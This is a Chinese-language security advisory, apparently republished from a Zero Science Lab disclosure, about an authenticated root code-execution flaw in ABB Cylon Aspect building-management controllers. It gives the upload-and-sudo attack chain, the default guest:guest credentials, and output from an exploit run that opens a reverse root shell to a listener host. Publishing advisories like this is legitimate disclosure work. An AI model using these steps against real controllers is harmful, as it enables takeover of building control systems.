ABB Cylon Aspect 3.08.03 Guest2Root权限提升

发布日期: 2025.06.02
作者: Gjoko ‘LiquidWorm’ Krstic
风险等级: 中等
本地利用: 否
远程利用: 是
CVE: N/A
CWE: CWE-264

漏洞概述

ABB Cylon Aspect是一款获奖的可扩展建筑能源管理和控制解决方案，允许用户通过标准建筑协议（包括智能设备）无缝访问其建筑数据。

漏洞描述

ABB BMS/BAS控制器存在代码执行和sudo配置错误漏洞。固件更新机制中的认证远程代码执行漏洞允许具有有效凭据的攻击者提升权限并以root身份执行命令。攻击过程涉及通过projectUpdateBSXFileProcess.php上传特制的.bsx文件，该文件随后被移动到htmlroot并由projectUpdateBSXExecute.php执行。此脚本利用sudo运行上传的bsx文件，使攻击者能够绕过输入验证检查并执行任意代码，导致系统完全被入侵和未经授权的root访问。

利用演示

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

$ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest
[o] Exploit starting at 21.05.2025 12:33:47
[o] Using credentials: guest:*****
[o] Auth successfull.
[o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688
[o] Listening on 192.168.73.9:5555...
[o] Building name: ["Tower 3"]
[o] runtime.ver=v3.08.03
[+] -> [virtual] rootshell

# id
uid=0(root) gid=0(root) groups=0(root)
# pwd
/home/MIX_CMIX/htmlroot
exit
[o] Removing callback file.
[!] Connection terminated.

受影响版本

• 产品系列: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
• 固件版本: <=3.08.03

测试环境

• GNU/Linux 3.15.10 (armv7l)
• GNU/Linux 3.10.0 (x86_64)
• GNU/Linux 2.6.32 (x86_64)
• Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
• Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
• PHP/7.3.11, PHP/5.6.30, PHP/5.4.16, PHP/4.4.8, PHP/5.3.3
• lighttpd/1.4.32, lighttpd/1.4.18
• Apache/2.2.15 (CentOS)

技术细节

漏洞利用涉及以下关键组件：

1. 认证绕过: 使用默认凭据（guest:guest）或有效会话令牌
2. 文件上传: 通过projectUpdateBSXFileProcess.php上传恶意.bsx文件
3. 命令执行: 利用projectUpdateBSXExecute.php执行上传的文件
4. 权限提升: 通过sudo配置错误获得root权限

利用代码

完整的Python利用代码包含以下主要功能：

• auth(): 处理用户认证
• kacuj(): 发送payload并执行命令
• koj_slusha(): 设置监听器接收命令输出
• main(): 主控制逻辑

安全建议

建议用户升级到不受影响的固件版本，并审查系统sudo配置。

漏洞发现者: Gjoko ‘LiquidWorm’ Krstic (@zeroscience)
安全公告ID: ZSL-2025-5947
公告URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php

日期: 2024年4月21日